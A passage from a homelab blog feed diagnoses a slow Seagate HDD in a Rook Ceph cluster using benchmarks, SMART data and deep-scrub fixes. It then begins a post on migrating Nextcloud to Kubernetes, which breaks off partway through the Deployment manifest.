For the disk in question, a Seagate 4 TB 5900 RPM model (ST4000VN008) with 64 MB of cache,
the apply latency looks like this, over the last couple of years since I installed
it in February of 2022:
<figure>
    <img loading="lazy" src="apply-latency-bad-hdd.png"
         alt="A screenshot of a Grafana time series plot. It shows the apply latency in milliseconds for the 5 OSDs in my baremetal Ceph cluster. It beings in February 2022 and goes up to April 2023. It shows plots for all five OSDs, but four of them show a very low latency in the 1 - 10 ms range. Only one OSD is absolutely consistently far above that, hovering around 50 ms for the entire interval of the graph."/> <figcaption>
            <p>Ceph apply OSD latency for the five OSDs in my baremetal cluster.</p>
        </figcaption>
</figure>

This is a pretty stark picture. The lone plot hovering around 50 ms is the same
HDD as the one which got the 100% IO utilization during the copy. In fairness,
from 2022-02 to 2022-12 it was connected to a Pi 4 8GB sitting in the official
I/O board with a SATA card in the PCIe slot. After that, it got transferred into
an Odroid H3, but did not seem to change its bad perf at all. Perhaps it got
complacent while sitting in the slow Pi and saw no reason to shape up after the
transfer into the H3? &#x1f609;
It&rsquo;s also important to note: Yes, two of the OSDs forming those indistinguishable
lines at the bottom are SSDs, but two of them are also WD Red 4 TB HDDs, 5400 RPM
drives. So it doesn&rsquo;t stand out like that because it&rsquo;s the only HDD. There are
other HDDs.</p>
<p>Having gotten curious, I ran <code>ceph tell osd.* bench</code> on my Rook Ceph cluster.
Here are the results:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>osd.0: <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_written&#34;</span>: 1073741824,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;blocksize&#34;</span>: 4194304,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;elapsed_sec&#34;</span>: 0.423324704,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_per_sec&#34;</span>: 2536449713.0788755,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;iops&#34;</span>: 604.7367365548314
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>osd.1: <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_written&#34;</span>: 1073741824,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;blocksize&#34;</span>: 4194304,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;elapsed_sec&#34;</span>: 0.348712521,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_per_sec&#34;</span>: 3079160509.9835229,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;iops&#34;</span>: 734.12907361591408
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>osd.2: <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_written&#34;</span>: 1073741824,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;blocksize&#34;</span>: 4194304,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;elapsed_sec&#34;</span>: 6.0028269730000003,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_per_sec&#34;</span>: 178872692.62125373,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;iops&#34;</span>: 42.646573214829857
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>osd.3: <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_written&#34;</span>: 1073741824,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;blocksize&#34;</span>: 4194304,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;elapsed_sec&#34;</span>: 23.502430691000001,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_per_sec&#34;</span>: 45686415.933615655,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;iops&#34;</span>: 10.892490371135629
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>The two first OSDs are the SATA SSDs, the third one is an 8 TB Seagate HDD and
the last one is the bad HDD. It&rsquo;s pretty clear that something is wrong here.
The 8 TB Seagate, <code>osd.2</code>, has 4x the IOPS of the 4 TB one. And at least from
all of the other metrics, it does look like IOPS, not e.g. CPU or networking,
is the issue.</p>
<p>Seeing that, I decided to dig even deeper, starting to worry that the disk
might be on its last leg - although it is newer than the two WD Red I&rsquo;ve got
in the baremetal cluster. And this is what <code>smartctl -a</code> outputs:</p>
<pre tabindex="0"><code>ID# ATTRIBUTE_NAME          FLAG     VALUE WORST THRESH TYPE      UPDATED  WHEN_FAILED RAW_VALUE
  1 Raw_Read_Error_Rate     0x000f   081   064   044    Pre-fail  Always       -       134444568
  3 Spin_Up_Time            0x0003   094   094   000    Pre-fail  Always       -       0
  4 Start_Stop_Count        0x0032   100   100   020    Old_age   Always       -       31
  5 Reallocated_Sector_Ct   0x0033   100   100   010    Pre-fail  Always       -       0
  7 Seek_Error_Rate         0x000f   088   060   045    Pre-fail  Always       -       629089568
  9 Power_On_Hours          0x0032   068   068   000    Old_age   Always       -       28425 (215 100 0)
 10 Spin_Retry_Count        0x0013   100   100   097    Pre-fail  Always       -       0
 12 Power_Cycle_Count       0x0032   100   100   020    Old_age   Always       -       30
184 End-to-End_Error        0x0032   100   100   099    Old_age   Always       -       0
187 Reported_Uncorrect      0x0032   100   100   000    Old_age   Always       -       0
188 Command_Timeout         0x0032   100   100   000    Old_age   Always       -       0
189 High_Fly_Writes         0x003a   100   100   000    Old_age   Always       -       0
190 Airflow_Temperature_Cel 0x0022   069   058   040    Old_age   Always       -       31 (Min/Max 24/35)
191 G-Sense_Error_Rate      0x0032   100   100   000    Old_age   Always       -       0
192 Power-Off_Retract_Count 0x0032   100   100   000    Old_age   Always       -       13
193 Load_Cycle_Count        0x0032   078   078   000    Old_age   Always       -       45654
194 Temperature_Celsius     0x0022   031   042   000    Old_age   Always       -       31 (0 22 0 0 0)
197 Current_Pending_Sector  0x0012   100   100   000    Old_age   Always       -       0
198 Offline_Uncorrectable   0x0010   100   100   000    Old_age   Offline      -       0
199 UDMA_CRC_Error_Count    0x003e   200   200   000    Old_age   Always       -       0
240 Head_Flying_Hours       0x0000   100   253   000    Old_age   Offline      -       26876 (182 226 0)
241 Total_LBAs_Written      0x0000   100   253   000    Old_age   Offline      -       58866038445
242 Total_LBAs_Read         0x0000   100   253   000    Old_age   Offline      -       472820704309
</code></pre><p>Look at those raw values for the Read and Seek error rates! &#x1f632;
But then I looked at the <code>VALUE</code> and <code>THRESH</code> values and started to be a bit
suspicious. Something wasn&rsquo;t adding up there, those values were looking okay.
So I started googling and came across <a href="https://www.reddit.com/r/unRAID/comments/toje8g/reminder_if_you_have_seagate_drives_and_a_high/">this reddit thread</a>,
which explains that these two values are actually multibit.
And applying the right transformation shows the real values:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>smartctl /dev/sda -a -v 1,raw48:54 -v 7,raw48:54
</span></span><span style="display:flex;"><span>ID# ATTRIBUTE_NAME          FLAG     VALUE WORST THRESH TYPE      UPDATED  WHEN_FAILED RAW_VALUE
</span></span><span style="display:flex;"><span>  <span style="color:#ae81ff">1</span> Raw_Read_Error_Rate     0x000f   <span style="color:#ae81ff">081</span>   <span style="color:#ae81ff">064</span>   <span style="color:#ae81ff">044</span>    Pre-fail  Always       -       <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>  <span style="color:#ae81ff">7</span> Seek_Error_Rate         0x000f   <span style="color:#ae81ff">088</span>   <span style="color:#ae81ff">060</span>   <span style="color:#ae81ff">045</span>    Pre-fail  Always       -       <span style="color:#ae81ff">0</span>
</span></span></code></pre></div><p>So it doesn&rsquo;t look like the disk has any obvious issues. But the IOPS are
still absolutely abysmal and worse than the 8TB disk&rsquo;s.</p>
<p>So what now? I&rsquo;m not sure. Replace the disk and hope that the replacement
fares better? I&rsquo;m not so sure about that. I&rsquo;m also still not 100% convinced
that it isn&rsquo;t an issue of the machine it sits in. It started its life as a
disk attached to a Raspberry Pi 4. And while the performance didn&rsquo;t get any
worse when I attached it to the Odroid H3, it also did not get any better, at
all. Still, I&rsquo;m not convinced that the host doesn&rsquo;t have something to do with
it.</p>
<p>One obvious solution would be to get a new HDD. Even if the old one is actually
fine, I can just use it as a spare in case of catastrophic failure. My main
concern for a new disk would be noise - my rack is right next to my desk, where
I spend most of my free time. The disk being quiet is pretty high on my list.
So a 5400 rpm disk would be the best choice. But: I&rsquo;ve also just spend several
paragraphs complaining about low IOPS on the HDD. And a 7200 RPM disk would
definitely have more of those. I&rsquo;m undecided.</p>
<p>A completely different approach would be going with Ceph&rsquo;s ability to split
WAL/DB and data. In Ceph, each OSD (the daemon which manages a single disk) stores
four types of data. The first I will not discuss any further is the OSD&rsquo;s config
data, like it&rsquo;s Ceph auth key. If this data is lost, the OSD could still be
recovered.
The WAL, Write Ahead Log, is a couple of GB worth of data that hasn&rsquo;t been written
to the actual file store yet. The third type is the RocksDB, which stores object
metadata, like the mappings from object name to object location on disk. The
fourth type of data to be stored is the payload itself - the actual data we want
to store. Now, when a new piece of data is written, Ceph doesn&rsquo;t just need to
spend the necessary IOPS for writing the payload to the disk, but also the
mandatory entry into the WAL and the update/addition of data in the RocksDB.
All of that doesn&rsquo;t just take time and bandwidth, but also and especially IOPS.</p>
<p>By default, and this is what I currently have in both of my Ceph clusters,
the WAL and the RocksDB are co-located with the data store on the same spinning
disk. So every piece of data is written twice to the same disk - once to the WAL,
and once to the main data store. And then there&rsquo;s the cost for the metadata
update on top. Quite a lot of IOPS for a spinning disk. But with the current
BlueStore implementation for the Ceph OSDs, the DB/WAL and the actual data
storage can reside on different disks. A pretty common strategy seems to be to
take the WAL/RocksDB for an HDD OSD and putting it on an SSD. From a sizing
perspective, the rule of thumb seems to be to make the WAL/RocksDB drive 4% the
size of the OSD&rsquo;s own disk. And even a SATA SSD can easily take care of multiple
OSDs. That would definitely be an interesting option to pursue. SATA SSDs aren&rsquo;t
that expensive anymore, at least for the relatively small sizes I&rsquo;m thinking about.</p>
<p>But then again, the choice for the Odroid H3 is biting me a bit here - the board
only has two SATA connectors, and they&rsquo;re both already occupied.</p>
<p>I think this is an interesting option, but I will have to think more about it.
As the HDD doesn&rsquo;t seem to have any obvious issue and isn&rsquo;t throwing any read
errors, I&rsquo;m happy to keep it running. And to be clear, I&rsquo;m only seeing issues
during larger copy operations. In daily use, the I/O utilization only goes
above 20% during the nightly scrubs. So it will stay for now.</p>
<h2 id="the-aftermath">The Aftermath</h2>
<p>On the positive side: I have my media library on the Rook cluster. But there was
also a downside I only became aware of a couple of days after the copy, namely
this cluster level warning starting to pop up on the Rook cluster:</p>
<pre tabindex="0"><code>ceph health detail
Info: running &#39;ceph&#39; command with args: [health detail]
HEALTH_WARN 1 pgs not deep-scrubbed in time
[WRN] PG_NOT_DEEP_SCRUBBED: 1 pgs not deep-scrubbed in time
    pg 5.17 not deep-scrubbed since 2025-02-06T07:10:51.660560+0000
</code></pre><p>Deep scrubs are Ceph&rsquo;s way of ensuring data consistency. The normal scrubs
just compare checksums and such, but the deep scrubs compare the actual data
between the different copies, so they&rsquo;re pretty expensive. In my clusters,
deep scrubs are allowed to be run in the time between 04:00 and 08:00.</p>
<p>But that time might not always be enough, and deep scrubs have a lower IO priority
than normal client access to the OSDs. So during the large copy operation, deep
scrubs got so slow that some PGs fell out of the required interval for deep
scrubs. This interval is seven days by default.</p>
<p>When this health warning pops up, a deep scrub can be triggered outside the
configured time window with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph pg deep-scrub 5.17
</span></span></code></pre></div><p>The PG which needs deep scrubbing is given in the health warning.</p>
<p>In addition, I also had another problem, PGs stuck in deep scrub for a very
long time.
Cases like this can be identified by running the following command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph pg dump pgs | grep <span style="color:#e6db74">&#34;+scrubbing+deep&#34;</span>
</span></span><span style="display:flex;"><span>3.1 <span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>  deep scrubbing <span style="color:#66d9ef">for</span> 214s <span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span></code></pre></div><p>If the time given is very large, the scrubbing is likely stuck. I&rsquo;ve found
that the following command helps in these cases:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph pg repeer 3.1
</span></span></code></pre></div><h2 id="conclusions">Conclusions</h2>
<p>Well, as I&rsquo;ve noted above, I might need to either get a new HDD or start
thinking about implementing WAL/RocksDB separation onto an SSD for my HDD OSDs.
It isn&rsquo;t really urgent, but these slow copy operations are still bothering me -
although they happen quite infrequently.</p>
<p>Another thing I&rsquo;ve learned through all of this is that I have to come up with
a standard I/O benchmark I apply to disks before creating the OSDs on it. While
I do trust the metrics and benchmark results I gave above, there was also a lot
of fluctuation in them, and not all runs showed the 4 TB Seagate to be quite
so bad.</p>
<p>There&rsquo;s still a hell of a lot to learn about storage. I&rsquo;m quite happy with Ceph
and definitely don&rsquo;t want to replace it, but I still feel the need to learn a
bit more.</p>
<p>And that&rsquo;s it for today. Next up for a post will be the migration of my Mastodon instance,
which is already done at the time I&rsquo;m writing these lines.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 19: Migrating Nextcloud</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-19-nextcloud/</link>
      <pubDate>Mon, 24 Feb 2025 21:25:54 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-19-nextcloud/</guid>
      <description>Migrating my Nextcloud instance to Kubernetes</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my Nextcloud instance to the k8s cluster.</p>
<p>This is part 20 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p><a href="https://nextcloud.com/">Nextcloud</a> is the oldest continuously running service
in my Homelab. It started out as an <a href="https://owncloud.com/">OwnCloud</a> deployment back
when I just called my Homelab my &ldquo;Heimserver&rdquo;. It ran continuously for more than
ten years, and I quite like it.</p>
<p>Initially I only used it for file sharing between my devices and as a better
alternative to a Samba share.
Over the years, I also started using it for contacts and calendar sharing
between my phone and desktop as well as sharing of my Firefox bookmarks between
my laptop and desktop via <a href="https://floccus.org/">Floccus</a>.
One perhaps somewhat surprising use case is for backups of OPNsense, which has
support for backing up its configuration to Nextcloud <a href="https://docs.opnsense.org/manual/how-tos/cloud_backup.html#setup-nextcloud-api-usage">out of the box</a>.</p>
<p>My most recent use case was for notes sharing. When I&rsquo;m researching something,
say a new app I&rsquo;d like to deploy in the Homelab, I like to plonk down in my
armchair with my tablet. For a long time, I then had a problem with sharing
notes between the tablet and my desktop. After some searching, I found Nextcloud&rsquo;s
<a href="https://apps.nextcloud.com/apps/notes">Notes app</a>. It isn&rsquo;t the greatest
note taking app, but it does the job adequately for what I need, allowing me
to paste some links and write some comments on them while lounging in my armchair.</p>
<h2 id="nextcloud-configuration">Nextcloud configuration</h2>
<p>I&rsquo;ve been using Nextcloud&rsquo;s community-lead <a href="https://hub.docker.com/_/nextcloud/">FPM image</a>,
which only contains Nextcloud itself, but no web server or anything else.
For serving static assets and also just generally fronting Nextcloud, I&rsquo;m using
<a href="https://caddyserver.com/">Caddy</a>.
For improved performance (or rather, reduced load), I&rsquo;m also deploying the
Rust-based <a href="https://github.com/nextcloud/notify_push">push_notify app</a>.
It sends update notifications to connected clients, instead of needing the
clients to poll the server for changes.</p>
<p>Finally, Nextcloud needs some regular cleanup tasks to be executed. And it being
a PHP app without any scheduling capability, it needs the trigger for those
regular tasks to come from outside the app itself. This can be configured in three
ways:</p>
<ol>
<li>Running a task or two for every page load by a user</li>
<li>Calling a dedicated URL regularly</li>
<li>Setting up a cron job to call a dedicated PHP file</li>
</ol>
<p>I&rsquo;ve opted for option 2), because running a cron job in a container still doesn&rsquo;t
seem to be a solved problem, and I&rsquo;ve found that using option 1) was not enough,
because I don&rsquo;t actually visit the web interface too often.</p>
<p>Then there&rsquo;s also the question of data storage. A couple of years back, after I
got my Ceph cluster up and running, I switched from a file-based backend to
S3. This allowed me to stop worrying about partition sizes at least. But this,
as all too many things in Nextcloud, has its quirks. Most importantly: Not all
data gets stored in the S3 bucket. You still need to provide Nextcloud with a
persistent volume, but at least its small: For my 10 - 15 years old instance,
it&rsquo;s only 29 MB worth of data. But still, it&rsquo;s there.</p>
<h2 id="preparations">Preparations</h2>
<p>Preparing for the move, I had to set up three volumes.</p>
<p>The first one is the
<em>webapp</em> volume. This volume will be mounted into all of the containers of the
Pod, and it will contain Nextcloud&rsquo;s <code>/var/www/html</code> directory, where the
Nextcloud code lives.
This needs to be an RWX volume, because it needs to be accessed by the Nextcloud
FPM container, the Caddy container and the notify-push container. For this,
I created a 10 GB CephFS PersistentVolumeClaim, as that doesn&rsquo;t have any issues
with concurrent access.</p>
<p>The second volume is for the data. As noted above, this one should not need too
much space due to me using S3 for storage, so it&rsquo;s only 1 GB. And finally there&rsquo;s
a scratch volume for Caddy, which also needs a bit of local storage. But that&rsquo;s
even smaller than the data volume, at only 500 MB.</p>
<p>Nextcloud also needs a database, which I&rsquo;m running on <a href="https://cloudnative-pg.io/">CloudNativePG</a>
again. I&rsquo;ve described how I&rsquo;m migrating databases in detail <a href="https://blog.mei-home.net/posts/k8s-migration-16-gitea/#database-setup-and-migration">here</a>.</p>
<h2 id="nextclouds-deployment">Nextcloud&rsquo;s deployment</h2>
<p>The Nextcloud Deployment manifest is pretty long, due to the number of containers
I&rsquo;m running in the Pod. Here it is in its entirety, I will describe the pieces
in detail later:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">nextcloud</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">nextcloud</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/config-nc</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/nextcloud-config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/config-caddy</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/caddy-config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">33</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">runAsUser</span>: <span style="color:#ae81ff">33</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">runAsGroup</span>: <span style="color:#ae81ff">33</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">initContainers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-init</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">alpine:latest</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/data</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;cp&#34;</span>, <span style="color:#e6db74">&#34;/config/config.php&#34;</span>, <span style="color:#e6db74">&#34;/data/config/config.php&#34;</span>]
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">nextcloud:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/homenet-data/data</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">subPath</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/var/www/html</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">400m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">2048Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">envFrom</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-bucket</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">optional</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-secrets</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">optional</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">configMapRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-bucket</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">optional</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_REDIS_HOST</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;redis.redis.svc.cluster.local&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_REDIS_PORT</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;6379&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_DB_NAME</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">dbname</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_DB_HOST</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_DB_PORT</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">port</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_DB_USER</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_DB_PW</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">password</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-push</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">nextcloud:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;/usr/bin/bash&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-c&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;chmod u+x /var/www/html/custom_apps/notify_push/bin/$(uname -m)/notify_push; /var/www/html/custom_apps/notify_push/bin/$(uname -m)/notify_push&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/var/www/html</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">128Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">NEXTCLOUD_URL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;https://nc.example.com&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">REDIS_URL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;redis://redis.redis.svc.cluster.local:6379&#34;</span>
